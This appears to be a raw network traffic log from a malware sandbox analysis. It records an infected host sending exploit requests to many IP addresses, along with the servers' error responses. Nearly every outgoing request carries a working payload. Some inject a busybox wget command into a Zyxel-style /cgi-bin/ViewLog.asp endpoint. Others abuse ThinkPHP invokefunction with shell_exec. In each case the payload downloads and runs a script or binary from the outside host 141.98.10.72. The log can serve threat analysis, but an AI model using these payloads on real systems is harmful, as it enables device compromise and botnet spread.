                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:03.835385084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      345192.168.2.154558031.136.129.1948080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.455075979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:42.137758017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.481729984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.265702963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.641561031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.393388987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.920541048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:07.927265882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      346192.168.2.154719462.231.108.1268080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.483633041 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.709477901 CET445INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:45:42 GMT
                                                      Server: Apache/2.4.6 (CentOS)
                                                      Content-Length: 217
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      347192.168.2.155659462.84.119.188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.488308907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.725195885 CET305INHTTP/1.1 404
                                                      X-Application-Context: application
                                                      Content-Type: application/json;charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Date: Wed, 14 Feb 2024 08:29:41 GMT
                                                      Data Raw: 37 62 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 37 38 39 39 33 38 31 33 31 31 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 20 6d 65 73 73 61 67 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                                      Data Ascii: 7b{"timestamp":1707899381311,"status":404,"error":"Not Found","message":"No message available","path":"/cgi-bin/ViewLog.asp"}


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      348192.168.2.154882031.43.105.298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.490322113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.723164082 CET536INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:41 GMT
                                                      Server:
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      349192.168.2.156032494.26.41.1968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.656148911 CET380INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 10:29:41 GMT
                                                      Connection: close
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Cache-Control: post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      350192.168.2.155791888.32.110.17080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:42.295082092 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:42.510452032 CET325INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.14.1
                                                      Date: Wed, 14 Feb 2024 08:29:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 173
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>
                                                      Feb 14, 2024 09:29:42.715861082 CET325INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.14.1
                                                      Date: Wed, 14 Feb 2024 08:29:41 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 173
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      351192.168.2.153912495.217.80.17480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:42.740947962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:42.960546970 CET437INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:42 GMT
                                                      Server: Apache/2.4.58 (IUS) OpenSSL/1.0.2k-fips
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      352192.168.2.155879495.216.140.6480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:42.743455887 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:42.968424082 CET1286INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:42 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Accept-Ranges: bytes
                                                      Vary: Accept-Encoding
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: 0
                                                      Content-Type: text/html
                                                      Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-
                                                      Feb 14, 2024 09:29:42.968461037 CET1286INData Raw: 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20
                                                      Data Ascii: size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                      Feb 14, 2024 09:29:42.968498945 CET1286INData Raw: 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a
